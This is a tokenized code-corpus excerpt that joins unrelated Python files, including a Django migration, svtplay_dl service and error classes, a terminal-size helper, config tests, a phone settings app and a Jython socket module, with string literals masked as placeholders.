'<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:url>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:email>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:password>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:username>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : "<STR_LIT>" } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) <EOL> } <EOL> } <EOL> complete_apps = [ '<STR_LIT>' ] </s>
<s> from __future__ import absolute_import <EOL> class UIException ( Exception ) : <EOL> pass <EOL> class ServiceError ( Exception ) : <EOL> pass <EOL> class NoRequestedProtocols ( UIException ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , requested , found ) : <EOL> """<STR_LIT>""" <EOL> self . requested = requested <EOL> self . found = found <EOL> super ( NoRequestedProtocols , self ) . __init__ ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" % ( <EOL> self . found , self . requested <EOL> ) <EOL> ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( <EOL> self . requested , self . found ) </s>
<s> from __future__ import absolute_import <EOL> import re <EOL> import copy <EOL> import xml . etree . ElementTree as ET <EOL> from svtplay_dl . service import Service , OpenGraphThumbMixin <EOL> from svtplay_dl . utils import is_py2_old <EOL> from svtplay_dl . error import ServiceError <EOL> from svtplay_dl . fetcher . rtmp import RTMP <EOL> class Qbrick ( Service , OpenGraphThumbMixin ) : <EOL> supported_domains = [ '<STR_LIT>' ] <EOL> def get ( self ) : <EOL> data = self . get_urldata ( ) <EOL> if self . exclude ( self . options ) : <EOL> yield ServiceError ( "<STR_LIT>" ) <EOL> return <EOL> if re . findall ( r"<STR_LIT>" , self . url ) : <EOL> match = re . search ( "<STR_LIT>" , data ) <EOL> if not match : <EOL> yield ServiceError ( "<STR_LIT>" % self . url ) <EOL> return <EOL> data = self . http . request ( "<STR_LIT>" , match . group ( <NUM_LIT:1> ) ) . content <EOL> match = re . search ( r"<STR_LIT>" , data ) <EOL> if not match : <EOL> yield ServiceError ( "<STR_LIT>" % self . url ) <EOL> return <EOL> host = "<STR_LIT>" % match . group ( <NUM_LIT:1> ) <EOL> else : <EOL> yield ServiceError ( "<STR_LIT>" % self . url ) <EOL> return <EOL> data = self . http . request ( "<STR_LIT>" , host ) . content <EOL> xml = ET . XML ( data ) <EOL> try : <EOL> url = xml . find ( "<STR_LIT>" ) . find ( "<STR_LIT>" ) . find ( "<STR_LIT>" ) . find ( "<STR_LIT>" ) . find ( "<STR_LIT>" ) . find ( "<STR_LIT>" ) . text <EOL> except AttributeError : <EOL> yield ServiceError ( "<STR_LIT>" ) <EOL> return <EOL> live = xml . find ( "<STR_LIT>" ) . find ( "<STR_LIT>" ) . find ( "<STR_LIT>" ) . find ( "<STR_LIT>" ) . attrib [ "<STR_LIT>" ] <EOL> if live == "<STR_LIT:true>" : <EOL> self . options . live = True <EOL> data = self . http . request ( "<STR_LIT>" , url ) . content <EOL> xml = ET . XML ( data ) <EOL> server = xml . find ( "<STR_LIT>" ) . find ( "<STR_LIT>" ) . attrib [ "<STR_LIT>" ] <EOL> streams = xml . find ( "<STR_LIT:body>" ) . find ( "<STR_LIT>" ) <EOL> if is_py2_old : <EOL> sa = list ( streams . getiterator ( "<STR_LIT>" ) ) <EOL> else : <EOL> sa = list ( streams . iter ( "<STR_LIT>" ) ) <EOL> for i in sa : <EOL> self . options . other = "<STR_LIT>" % i . attrib [ "<STR_LIT:src>" ] <EOL> yield RTMP ( copy . copy ( self . options ) , server , i . attrib [ "<STR_LIT>" ] ) </s>
<s> import os <EOL> import shlex <EOL> import struct <EOL> import platform <EOL> import subprocess <EOL> def get_terminal_size ( ) : <EOL> """<STR_LIT>""" <EOL> current_os = platform . system ( ) <EOL> tuple_xy = None <EOL> if current_os == '<STR_LIT>' : <EOL> tuple_xy = _get_terminal_size_windows ( ) <EOL> if tuple_xy is None : <EOL> tuple_xy = _get_terminal_size_tput ( ) <EOL> if current_os in [ '<STR_LIT>' , '<STR_LIT>' ] or current_os . startswith ( '<STR_LIT>' ) : <EOL> tuple_xy = _get_terminal_size_linux ( ) <EOL> if tuple_xy is None : <EOL> tuple_xy = ( <NUM_LIT> , <NUM_LIT> ) <EOL> return tuple_xy <EOL> def _get_terminal_size_windows ( ) : <EOL> try : <EOL> from ctypes import windll , create_string_buffer <EOL> h = windll . kernel32 . GetStdHandle ( - <NUM_LIT:12> ) <EOL> csbi = create_string_buffer ( <NUM_LIT> ) <EOL> res = windll . kernel32 . GetConsoleScreenBufferInfo ( h , csbi ) <EOL> if res : <EOL> ( bufx , bufy , curx , cury , wattr , <EOL> left , top , right , bottom , <EOL> maxx , maxy ) = struct . unpack ( "<STR_LIT>" , csbi . raw ) <EOL> sizex = right - left + <NUM_LIT:1> <EOL> sizey = bottom - top + <NUM_LIT:1> <EOL> return sizex , sizey <EOL> except : <EOL> pass <EOL> def _get_terminal_size_tput ( ) : <EOL> try : <EOL> cols = int ( subprocess . check_call ( shlex . split ( '<STR_LIT>' ) ) ) <EOL> rows = int ( subprocess . check_call ( shlex . split ( '<STR_LIT>' ) ) ) <EOL> return ( cols , rows ) <EOL> except : <EOL> pass <EOL> def _get_terminal_size_linux ( ) : <EOL> def ioctl_GWINSZ ( fd ) : <EOL> try : <EOL> import fcntl <EOL> import termios <EOL> cr = struct . unpack ( '<STR_LIT>' , <EOL> fcntl . ioctl ( fd , termios . TIOCGWINSZ , '<STR_LIT>' ) ) <EOL> return cr <EOL> except : <EOL> pass <EOL> cr = ioctl_GWINSZ ( <NUM_LIT:0> ) or ioctl_GWINSZ ( <NUM_LIT:1> ) or ioctl_GWINSZ ( <NUM_LIT:2> ) <EOL> if not cr : <EOL> try : <EOL> fd = os . open ( os . ctermid ( ) , os . O_RDONLY ) <EOL> cr = ioctl_GWINSZ ( fd ) <EOL> os . close ( fd ) <EOL> except : <EOL> pass <EOL> if not cr : <EOL> try : <EOL> cr = ( os . environ [ '<STR_LIT>' ] , os . environ [ '<STR_LIT>' ] ) <EOL> except : <EOL> return None <EOL> return int ( cr [ <NUM_LIT:1> ] ) , int ( cr [ <NUM_LIT:0> ] ) </s>
<s> from busbus . util import Config <EOL> import os <EOL> import pytest <EOL> def test_config_defaults ( ) : <EOL> config = Config ( ) <EOL> assert config [ '<STR_LIT>' ] . endswith ( '<STR_LIT>' ) <EOL> def test_config_without_home ( ) : <EOL> old_home = os . environ [ '<STR_LIT>' ] <EOL> del os . environ [ '<STR_LIT>' ] <EOL> config = Config ( ) <EOL> assert ( os . path . abspath ( config [ '<STR_LIT>' ] ) == <EOL> os . path . abspath ( '<STR_LIT>' ) ) <EOL> os . environ [ '<STR_LIT>' ] = old_home <EOL> def test_config_busbus_dir ( ) : <EOL> config = Config ( { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> assert config [ '<STR_LIT>' ] == '<STR_LIT>' <EOL> def test_config_keyerror ( ) : <EOL> config = Config ( ) <EOL> with pytest . raises ( KeyError ) as exc : <EOL> config [ '<STR_LIT>' ] <EOL> assert exc . value . args [ <NUM_LIT:0> ] == '<STR_LIT>' </s>
<s> """<STR_LIT>""" </s>
<s> from subprocess import Popen <EOL> import sys <EOL> import pygame <EOL> class Run ( ) : <EOL> def __init__ ( self , fona ) : <EOL> self . fona = fona <EOL> self . headset = False <EOL> self . get_audio_mode ( ) <EOL> self . RED = ( <NUM_LIT:255> , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> self . GREEN = ( <NUM_LIT:0> , <NUM_LIT:255> , <NUM_LIT:0> ) <EOL> self . WHITE = ( <NUM_LIT:255> , <NUM_LIT:255> , <NUM_LIT:255> ) <EOL> self . menu = pygame . image . load ( '<STR_LIT>' ) <EOL> self . menu_rect = self . menu . get_rect ( ) <EOL> self . font = pygame . font . Font ( '<STR_LIT>' , <NUM_LIT:32> ) <EOL> self . off = self . font . render ( '<STR_LIT>' , True , self . RED , self . WHITE ) <EOL> self . fona_power = self . font . render ( '<STR_LIT>' , True , self . GREEN , self . WHITE ) <EOL> self . fona_power_rect = self . off . get_rect ( ) <EOL> self . fona_power_rect . centerx = <NUM_LIT> <EOL> self . fona_power_rect . centery = <NUM_LIT> <EOL> self . on = self . font . render ( '<STR_LIT>' , True , self . GREEN , self . WHITE ) <EOL> self . rect = self . off . get_rect ( ) <EOL> self . rect . centerx = <NUM_LIT> <EOL> self . rect . y = <NUM_LIT> <EOL> self . exit = False <EOL> self . blit_one_surface = { '<STR_LIT>' : [ ] , '<STR_LIT>' : [ ] } <EOL> self . blit = { '<STR_LIT>' : [ self . menu , self . fona_power , self . off ] , '<STR_LIT>' : [ self . menu_rect , self . fona_power_rect , self . rect ] } <EOL> if self . headset : <EOL> self . blit [ '<STR_LIT>' ] [ <NUM_LIT:2> ] = self . on <EOL> else : <EOL> self . blit [ '<STR_LIT>' ] [ <NUM_LIT:2> ] = self . off <EOL> self . next_app = None <EOL> def get_audio_mode ( self ) : <EOL> audio_config = open ( '<STR_LIT>' , '<STR_LIT:r>' ) <EOL> file = audio_config . readlines ( ) <EOL> for i in range ( <NUM_LIT:0> , len ( file ) ) : <EOL> if file [ i ] [ <NUM_LIT:0> ] == '<STR_LIT:#>' : <EOL> pass <EOL> else : <EOL> file [ i ] = file [ i ] . rstrip ( ) <EOL> if '<STR_LIT>' in file [ i ] : <EOL> mode = file [ i ] <EOL> mode = mode . split ( '<STR_LIT:=>' ) <EOL> self . mode = int ( mode [ <NUM_LIT:1> ] ) <EOL> if self . mode == <NUM_LIT:1> : <EOL> self . headset = False <EOL> else : <EOL> self . headset = True <EOL> def run_app ( self ) : <EOL> pass <EOL> def get_events ( self , event ) : <EOL> if event . pos [ <NUM_LIT:1> ] > <NUM_LIT> and event . pos [ <NUM_LIT:1> ] < <NUM_LIT> : <EOL> self . delete_sms ( ) <EOL> if event . pos [ <NUM_LIT:1> ] > <NUM_LIT> and event . pos [ <NUM_LIT:1> ] < <NUM_LIT> : <EOL> self . set_headset ( ) <EOL> if event . pos [ <NUM_LIT:1> ] > <NUM_LIT> and event . pos [ <NUM_LIT:1> ] < <NUM_LIT> : <EOL> self . exit = True <EOL> def on_first_run ( self ) : <EOL> self . exit = False <EOL> def delete_sms ( self ) : <EOL> self . fona . transmit ( '<STR_LIT>' ) <EOL> self . exit = True <EOL> def set_headset ( self ) : <EOL> if self . headset : <EOL> self . blit [ '<STR_LIT>' ] [ <NUM_LIT:2> ] = self . off <EOL> self . headset = False <EOL> self . fona . transmit ( '<STR_LIT>' ) <EOL> else : <EOL> self . blit [ '<STR_LIT>' ] [ <NUM_LIT:2> ] = self . on <EOL> self . headset = True <EOL> self . fona . transmit ( '<STR_LIT>' ) </s>
<s> class SftpException ( Exception ) : pass <EOL> class SftpConfigException ( SftpException ) : pass <EOL> class SftpMountException ( SftpException ) : <EOL> def __init__ ( self , mount_cmd , mount_cmd_output ) : <EOL> self . mount_cmd = mount_cmd <EOL> self . mount_cmd_output = mount_cmd_output </s>
<s> """<STR_LIT>""" <EOL> _defaulttimeout = None <EOL> import errno <EOL> import jarray <EOL> import string <EOL> import struct <EOL> import sys <EOL> import threading <EOL> import time <EOL> import types <EOL> import java . io . BufferedInputStream <EOL> import java . io . BufferedOutputStream <EOL> import java . io . InterruptedIOException <EOL> import java . io . IOException <EOL> import java . lang . String <EOL> import java . lang . Exception <EOL> import java . net . DatagramPacket <EOL> import java . net . InetAddress <EOL> import java . net . InetSocketAddress <EOL> import java . net . Socket <EOL> import java . net . BindException <EOL> import java . net . ConnectException <EOL> import java . net . NoRouteToHostException <EOL> import java . net . PortUnreachableException <EOL> import java . net . ProtocolException <EOL> import java . net . SocketException <EOL> import java . net . SocketTimeoutException <EOL> import java . net . UnknownHostException <EOL> import java . nio . ByteBuffer <EOL> import java . nio . channels . DatagramChannel <EOL> import java . nio . channels . ServerSocketChannel <EOL> import java . nio . channels . SocketChannel <EOL> import java . nio . channels . AlreadyConnectedException <EOL> import java . nio . channels . AsynchronousCloseException <EOL> import java . nio . channels . CancelledKeyException <EOL> import java . nio . channels . ClosedByInterruptException <EOL> import java . nio . channels . ClosedChannelException <EOL> import java . nio . channels . ClosedSelectorException <EOL> import java . nio . channels . ConnectionPendingException <EOL> import java . nio . channels . IllegalBlockingModeException <EOL> import java . nio . channels . IllegalSelectorException <EOL> import java . nio . channels . NoConnectionPendingException <EOL> import java . nio . channels . NonReadableChannelException <EOL> import java . nio . channels . NonWritableChannelException <EOL> import java . nio . channels . NotYetBoundException <EOL> import java . nio . channels . NotYetConnectedException <EOL> import java . nio . channels . UnresolvedAddressException <EOL> import java . nio . channels . UnsupportedAddressTypeException <EOL> import javax . net . ssl . SSLSocketFactory <EOL> javax . net . ssl . SSLException <EOL> javax . net . ssl . SSLHandshakeException <EOL> javax . net . ssl . SSLKeyException <EOL> javax . net . ssl . SSLPeerUnverifiedException <EOL> javax . net . ssl . SSLProtocolException <EOL> import org . python . core . io . DatagramSocketIO <EOL> import org . python . core . io . ServerSocketIO <EOL> import org . python . core . io . SocketIO <EOL> from org . python . core . Py import newString as asPyString <EOL> class error ( Exception ) : pass <EOL> class herror ( error ) : pass <EOL> class gaierror ( error ) : pass <EOL> class timeout ( error ) : pass <EOL> class sslerror ( error ) : pass <EOL> ALL = None <EOL> _exception_map = { <EOL> ( java . io . IOException , ALL ) : lambda : error ( errno . ECONNRESET , '<STR_LIT>' ) , <EOL> ( java . io . InterruptedIOException , ALL ) : lambda : timeout ( '<STR_LIT>' ) , <EOL> ( java . net . BindException , ALL ) : lambda : error ( errno . EADDRINUSE , '<STR_LIT>' ) , <EOL> ( java . net . ConnectException , ALL ) : lambda : error ( errno . ECONNREFUSED , '<STR_LIT>' ) , <EOL> ( java . net . NoRouteToHostException , ALL ) : None , <EOL> ( java . net . PortUnreachableException , ALL ) : None , <EOL> ( java . net . ProtocolException , ALL ) : None , <EOL> ( java . net . SocketException , ALL ) : None , <EOL> ( java . net . SocketTimeoutException , ALL ) : lambda : timeout ( '<STR_LIT>' ) , <EOL> ( java . net . UnknownHostException , ALL ) : lambda : gaierror ( errno . EGETADDRINFOFAILED , '<STR_LIT>' ) , <EOL> ( java . nio . channels . AlreadyConnectedException , ALL ) : lambda : error ( errno . EISCONN , '<STR_LIT>' ) , <EOL> ( java . nio . channels . AsynchronousCloseException , ALL ) : None , <EOL> ( java . nio . channels . CancelledKeyException , ALL ) : None , <EOL> ( java . nio . channels . ClosedByInterruptException , ALL ) : None , <EOL> ( java . nio . channels . ClosedChannelException , ALL ) : lambda : error ( errno . EPIPE , '<STR_LIT>' ) , <EOL> ( java . nio . channels . ClosedSelectorException , ALL ) : None , <EOL> ( java . nio . channels . ConnectionPendingException , ALL ) : None , <EOL> ( java . nio . channels . IllegalBlockingModeException , ALL ) : None , <EOL> ( java . nio . channels . IllegalSelectorException , ALL ) : None , <EOL> ( java . nio . channels . NoConnectionPendingException , ALL ) : None , <EOL> ( java . nio . channels . NonReadableChannelException , ALL ) : None , <EOL> ( java . nio . channels . NonWritableChannelException , ALL ) : None , <EOL> ( java . nio . channels . NotYetBoundException , ALL ) : None , <EOL> ( java . nio . channels . NotYetConnectedException , ALL ) : None , <EOL> ( java . nio . channels . UnresolvedAddressException , ALL ) : lambda : gaierror ( errno . EGETADDRINFOFAILED , '<STR_LIT>' ) , <EOL> ( java . nio . channels . UnsupportedAddressTypeException , ALL ) : None , <EOL> ( javax . net . ssl . SSLException , ALL ) : lambda : sslerror ( - <NUM_LIT:1> , '<STR_LIT>' ) , <EOL> ( javax . net . ssl . SSLHandshakeException , ALL ) : lambda : sslerror ( - <NUM_LIT:1> , '<STR_LIT>' ) , <EOL> ( javax . net . ssl . SSLKeyException , ALL ) : lambda : sslerror ( - <NUM_LIT:1> , '<STR_LIT>' ) , <EOL> ( javax . net . ssl . SSLPeerUnverifiedException , ALL ) : lambda : sslerror ( - <NUM_LIT:1> , '<STR_LIT>' ) , <EOL> ( javax . net . ssl . SSLProtocolException , ALL ) : lambda : sslerror ( - <NUM_LIT:1> , '<STR_LIT>' ) , <EOL> } <EOL> def would_block_error ( exc = None ) : <EOL> return error ( errno . EWOULDBLOCK , '<STR_LIT>' ) <EOL> def _map_exception ( exc , circumstance = ALL ) : <EOL> mapped_exception = _exception_map . get ( ( exc . __class__ , circumstance ) ) <EOL> if mapped_exception : <EOL> exception = mapped_exception ( ) <EOL> else : <EOL> exception = error ( - <NUM_LIT:1> , '<STR_LIT>' % exc ) <EOL> exception . java_exception = exc <EOL> return exception <EOL> MODE_BLOCKING = '<STR_LIT>' <EOL> MODE_NONBLOCKING = '<STR_LIT>' <EOL> MODE_TIMEOUT = '<STR_LIT>' <EOL> _permitted_modes = ( MODE_BLOCKING , MODE_NONBLOCKING , MODE_TIMEOUT ) <EOL> SHUT_RD = <NUM_LIT:0> <EOL> SHUT_WR = <NUM_LIT:1> <EOL> SHUT_RDWR = <NUM_LIT:2> <EOL> AF_UNSPEC = <NUM_LIT:0> <EOL> AF_INET = <NUM_LIT:2> <EOL> AF_INET6 = <NUM_LIT> <EOL> AI_PASSIVE = <NUM_LIT:1> <EOL> AI_CANONNAME = <NUM_LIT:2> <EOL> SOCK_DGRAM = <NUM_LIT:1> <EOL> SOCK_STREAM = <NUM_LIT:2> <EOL> SOCK_RAW = <NUM_LIT:3> <EOL> SOCK_RDM = <NUM_LIT:4> <EOL> SOCK_SEQPACKET = <NUM_LIT:5> <EOL> SOL_SOCKET = <NUM_LIT> <EOL> IPPROTO_TCP = <NUM_LIT:6> <EOL> IPPROTO_UDP = <NUM_LIT> <EOL> SO_BROADCAST = <NUM_LIT:1> <EOL> SO_KEEPALIVE = <NUM_LIT:2> <EOL> SO_LINGER = <NUM_LIT:4> <EOL> SO_OOBINLINE = <NUM_LIT:8> <EOL> SO_RCVBUF = <NUM_LIT:16> <EOL> SO_REUSEADDR = <NUM_LIT:32> <EOL> SO_SNDBUF = <NUM_LIT:64> <EOL> SO_TIMEOUT = <NUM_LIT> <EOL> TCP_NODELAY = <NUM_LIT> <EOL> INADDR_ANY = "<STR_LIT>" <EOL> INADDR_BROADCAST = "<STR_LIT>" <EOL> SO_ACCEPTCONN = - <NUM_LIT:1> <EOL> SO_DEBUG = - <NUM_LIT:2> <EOL> SO_DONTROUTE = - <NUM_LIT:4> <EOL> SO_ERROR = - <NUM_LIT:8> <EOL> SO_EXCLUSIVEADDRUSE = - <NUM_LIT:16> <EOL> SO_RCVLOWAT = - <NUM_LIT:32> <EOL> SO_RCVTIMEO = - <NUM_LIT:64> <EOL> SO_REUSEPORT = - <NUM_LIT> <EOL> SO_SNDLOWAT = - <NUM_LIT> <EOL> SO_SNDTIMEO = - <NUM_LIT> <EOL> SO_TYPE = - <NUM_LIT> <EOL> SO_USELOOPBACK = - <NUM_LIT> <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT:error>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> ] <EOL> def _constant_to_name ( const_value ) : <EOL> sock_module = sys . modules [ '<STR_LIT>' ] <EOL> try : <EOL> for name in dir ( sock_module ) : <EOL> if getattr ( sock_module , name ) is const_value : <EOL> return name <EOL> return "<STR_LIT>" <EOL> finally : <EOL> sock_module = None <EOL> class _nio_impl : <EOL> timeout = None <EOL> mode = MODE_BLOCKING <EOL> def getpeername ( self ) : <EOL> return ( self . jsocket . getInetAddress ( ) . getHostAddress ( ) , self . jsocket . getPort ( ) ) <EOL> def config ( self , mode , timeout ) : <EOL> self . mode = mode <EOL> if self . mode == MODE_BLOCKING : <EOL> self . jchannel . configureBlocking ( <NUM_LIT:1> ) <EOL> if self . mode == MODE_NONBLOCKING : <EOL> self . jchannel . configureBlocking ( <NUM_LIT:0> ) <EOL> if self . mode == MODE_TIMEOUT : <EOL> self . jchannel . configureBlocking ( <NUM_LIT:1> ) <EOL> self . _timeout_millis = int ( timeout * <NUM_LIT:1000> ) <EOL> self . jsocket . setSoTimeout ( self . _timeout_millis ) <EOL> def getsockopt ( self , level , option ) : <EOL> if self . options . has_key ( ( level , option ) ) : <EOL> result = getattr ( self . jsocket , "<STR_LIT>" % self . options [ ( level , option ) ] ) ( ) <EOL> if option == SO_LINGER : <EOL> if result == - <NUM_LIT:1> : <EOL> enabled , linger_time = <NUM_LIT:0> , <NUM_LIT:0> <EOL> else : <EOL> enabled , linger_time = <NUM_LIT:1> , result <EOL> return struct . pack ( '<STR_LIT>' , enabled , linger_time ) <EOL> return result <EOL> else : <EOL> raise error ( errno . ENOPROTOOPT , "<STR_LIT>" % ( _constant_to_name ( option ) , _constant_to_name ( level ) , str ( self . jsocket ) ) ) <EOL> def setsockopt ( self , level , option , value ) : <EOL> if self . options . has_key ( ( level , option ) ) : <EOL> if option == SO_LINGER : <EOL> values = struct . unpack ( '<STR_LIT>' , value ) <EOL> self . jsocket . setSoLinger ( * values ) <EOL> else : <EOL> getattr ( self . jsocket , "<STR_LIT>" % self . options [ ( level , option ) ] ) ( value ) <EOL> else : <EOL> raise error ( errno . ENOPROTOOPT , "<STR_LIT>" % ( _constant_to_name ( option ) , _constant_to_name ( level ) , str ( self . jsocket ) ) ) <EOL> def close ( self ) : <EOL> self . jsocket . close ( ) <EOL> def getchannel ( self ) : <EOL> return self . jchannel <EOL> def fileno ( self ) : <EOL> return self . socketio <EOL> class _client_socket_impl ( _nio_impl ) : <EOL> options = { <EOL> ( SOL_SOCKET , SO_KEEPALIVE ) : '<STR_LIT>' , <EOL> ( SOL_SOCKET , SO_LINGER ) : '<STR_LIT>' , <EOL> ( SOL_SOCKET , SO_OOBINLINE ) : '<STR_LIT>' , <EOL> ( SOL_SOCKET , SO_RCVBUF ) : '<STR_LIT>' , <EOL> ( SOL_SOCKET , SO_REUSEADDR ) : '<STR_LIT>' , <EOL> ( SOL_SOCKET , SO_SNDBUF ) : '<STR_LIT>' , <EOL> ( SOL_SOCKET , SO_TIMEOUT ) : '<STR_LIT>' , <EOL> ( IPPROTO_TCP , TCP_NODELAY ) : '<STR_LIT>' , <EOL> } <EOL> def __init__ ( self , socket = None ) : <EOL> if socket : <EOL> self . jchannel = socket . getChannel ( ) <EOL> self . host = socket . getInetAddress ( ) . getHostAddress ( ) <EOL> self . port = socket . getPort ( ) <EOL> else : <EOL> self . jchannel = java . nio . channels . SocketChannel . open ( ) <EOL> self . host = None <EOL> self . port = None <EOL> self . jsocket = self . jchannel . socket ( ) <EOL> self . socketio = org . python . core . io . SocketIO ( self . jchannel , '<STR_LIT>' ) <EOL> def bind ( self , host , port , reuse_addr ) : <EOL> self . jsocket . setReuseAddress ( reuse_addr ) <EOL> self . jsocket . bind ( java . net . InetSocketAddress ( host , port ) ) <EOL> def connect ( self , host , port ) : <EOL> self . host = host <EOL> self . port = port <EOL> if self . mode == MODE_TIMEOUT : <EOL> self . jsocket . connect ( java . net . InetSocketAddress ( self . host , self . port ) , self . _timeout_millis ) <EOL> else : <EOL> self . jchannel . connect ( java . net . InetSocketAddress ( self . host , self . port ) ) <EOL> def finish_connect ( self ) : <EOL> return self . jchannel . finishConnect ( ) <EOL> def _do_read_net ( self , buf ) : <EOL> return self . jsocket . getInputStream ( ) . read ( buf ) <EOL> def _do_read_nio ( self , buf ) : <EOL> bytebuf = java . nio . ByteBuffer . wrap ( buf ) <EOL> count = self . jchannel . read ( bytebuf ) <EOL> return count <EOL> def _do_write_net ( self , buf ) : <EOL> self . jsocket . getOutputStream ( ) . write ( buf ) <EOL> return len ( buf ) <EOL> def _do_write_nio ( self , buf ) : <EOL> bytebuf = java . nio . ByteBuffer . wrap ( buf ) <EOL> count = self . jchannel . write ( bytebuf ) <EOL> return count <EOL> def read ( self , buf ) : <EOL> if self . mode == MODE_TIMEOUT : <EOL> return self . _do_read_net ( buf ) <EOL> else : <EOL> return self . _do_read_nio ( buf ) <EOL> def write ( self , buf ) : <EOL> if self . mode == MODE_TIMEOUT : <EOL> return self . _do_write_net ( buf ) <EOL> else : <EOL> return self . _do_write_nio ( buf ) <EOL> def shutdown ( self , how ) : <EOL> if how in ( SHUT_RD , SHUT_RDWR ) : <EOL> self . jsocket . shutdownInput ( ) <EOL> if how in ( SHUT_WR , SHUT_RDWR ) : <EOL> self . jsocket . shutdownOutput ( ) <EOL> class _server_socket_impl ( _nio_impl ) : <EOL> options = { <EOL> ( SOL_SOCKET , SO_RCVBUF ) : '<STR_LIT>' , <EOL> ( SOL_SOCKET , SO_REUSEADDR ) : '<STR_LIT>' , <EOL> ( SOL_SOCKET , SO_TIMEOUT ) : '<STR_LIT>' , <EOL> } <EOL> def __init__ ( self , host , port , backlog , reuse_addr ) : <EOL> self . 